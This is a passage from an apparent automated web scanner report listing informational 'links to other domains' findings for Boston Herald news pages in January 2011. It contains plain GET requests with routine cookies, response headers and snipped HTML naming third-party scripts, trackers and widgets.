http://multimedia.heraldinteractive.com/images/20110123/stp/a7ee69_tweet_01242011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/9d0b32_marriot_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/552423_brown_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/0537a7_mainturner01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/8829cb_Obama_01262011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/acd93d_ltpSnowcommute012611.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/b47004_Tat_01262011.JPG
http://multimedia.heraldinteractive.com/images/20110126/stp/be916e_geo_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/columnists/?srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:46:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="Columnists - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/columnists/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries </a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/columnists/view/20110127what_next_baby_botox_little_girls_makeup_line_a_travesty/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/be916e_geo_01272011.jpg" alt="Wal-Mart’s new GeoGirl beauty line for ages 8-12."></a>
...[SNIP]...
<a href="/news/columnists/view/20110126sorry_seems_to_be_the_hardest_word/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/0537a7_mainturner01262011.jpg" alt="NO REMORSE: Chuck Turner was found guilty of accepting a bribe, but Judge Douglas Woodlock’s three year prison sentence was largely influenced by Turner’s ‘failure to recognize and accept responsibility.’"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="/news/columnists/view/20110126sorry_seems_to_be_the_hardest_word/srvc=col&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Poll"><a href="/news/columnists/view/20110126sorry_seems_to_be_the_hardest_word/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20110126non-essential_how_about_non-employed/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/acd93d_ltpSnowcommute012611.jpg" alt="Pedestrians walk along Washington St. in Chinatown."></a>
...[SNIP]...
<a href="/news/columnists/view/20110126tats_life_after_the_breakup_inky_reminders_remain/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/b47004_Tat_01262011.JPG" alt="BODY Of WORK: Tattoo artist Nate stevens of stingray Body art in Allston works on a Celtic Tree of life for Kathleen Rice this week. Stevens says he tells customers not to tattoo the names of their significant others, but that few heed his advice."></a>
...[SNIP]...
<a href="/news/columnists/view/20110126only_obama_can_fix_the_state_of_our_union/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/8829cb_Obama_01262011.jpg" alt="‘WE WILL MOVE FORWARD TOGETHER’: President Obama gestures while delivering his State of the Union address on Capitol Hill last night."></a>
...[SNIP]...
<a href="/news/columnists/view/20110125xxx-it_strategy_mitt-linked_hotel_chain_bans_adult_movies/"><img src="http://multimedia.heraldinteractive.com/images/20110124/stp/9d0b32_marriot_01252011.jpg" alt="Marriott Hotel."></a>
...[SNIP]...
<a href="/news/columnists/view/20110125date_night_in_dcbipartisan_buddy_system_in_place_for_state_of_the_union/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/552423_brown_01252011.jpg" alt="Bay State Republican Sen. Scott Brown"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20110125date_night_in_dcbipartisan_buddy_system_in_place_for_state_of_the_union/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20110124some_pols_say_twitter_ban_for_the_birds/"><img src="http://multimedia.heraldinteractive.com/images/20110123/stp/a7ee69_tweet_01242011.jpg" alt="Tweeting is allegedly now frowned upon at the State House. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Poll"><a href="/news/columnists/view/20110124some_pols_say_twitter_ban_for_the_birds/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20110123countdown_finally_runs_out_for_keith/"><img src="http://multimedia.heraldinteractive.com/images/20110122/stp/4f9728_Olbermann_01232011.jpg" alt="SIGNING OFF: Keith Olbermann, host of ‘Countdown’ on MSNBC, surprised viewers Friday night by announcing he was leaving."></a>
...[SNIP]...
<a href="/news/columnists/view/20110123peace_corps_pioneers_faith_sustained_him/"><img src="http://multimedia.heraldinteractive.com/images/20110122/stp/a42f16_Pall_01232011.jpg" alt="POTOMAC PROCESSION: The casket of R. Sargent Shriver is carried into church in Potomac, Md., yesterday for a funeral Mass, escorted by son Anthony, far right, daughter Maria, left, and her husband Arnold Schwarzenegger."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20110123peace_corps_pioneers_faith_sustained_him/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20110123in_defense_of_the_proper_use_of_force/"><img src="http://multimedia.heraldinteractive.com/images/20110122/stp/bff0cd_SWAT_01232011.jpg" alt="SERVE AND PROTECT: Boston police- seen here with SWAT team members at a call in Roxbury- invited media and community activists to the BPD Academy for a hands-on demonstration."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20110123in_defense_of_the_proper_use_of_force/srvc=col&position=">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Local Coverage" /></a>
...[SNIP]...
</div>

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="Local Politics" /></a>
...[SNIP]...
<div style="margin:0 0 20px 0; line-height:16px; width:310px">
<img style="float:left; margin:0 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif">
<span class="bold">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.279. http://www.bostonherald.com/news/columnists/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/columnists/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/columnists/view.bg?articleid=1312540&srvc=home&position=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2Fview%2F20110128speak_up_sal__or_itll_be_a_long_time_in_jail%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/columnists/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110126/stp/5ad244_sal_01272011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://widgets.mobilelocalnews.com/?uid=42b39fdb198522d2bfc6b1f64cd98365
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/columnists/view.bg?articleid=1312540&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2Fview%2F20110128speak_up_sal__or_itll_be_a_long_time_in_jail%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Speak up, Sal Dimasi— or it’ll be a long time in jail');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1312540&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(149) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/politics/view/20110127lawyer_dimasi_bracing_for_difficult_fight/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/5ad244_sal_01272011.jpg" alt="Lawyer: Sal DiMasi bracing for ‘difficult fight’" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.280. http://www.bostonherald.com/news/international/africa/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/international/africa/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/international/africa/view.bg?articleid=1312633&pos=breaking

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Finternational%2Fafrica%2Fview.bg%3Farticleid%3D1312633%26srvc%3Drss%26utm_source%3Dfeedburner%26utm_medium%3Dfeed%26utm_campaign%3DFeed%253A%2Bbostonherald%252Fnews%2B%2528News%2B%2526%2BOpinion%2B-%2BBostonHerald.com%2529&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/international/africa/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110128/097956_ltpEgyptC012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://widget.newsinc.com/single.htm?WID=2&VID=23316506&freewheel=90017&sitesection=bostonherald
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/international/africa/view.bg?articleid=1312633&pos=breaking HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:49:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



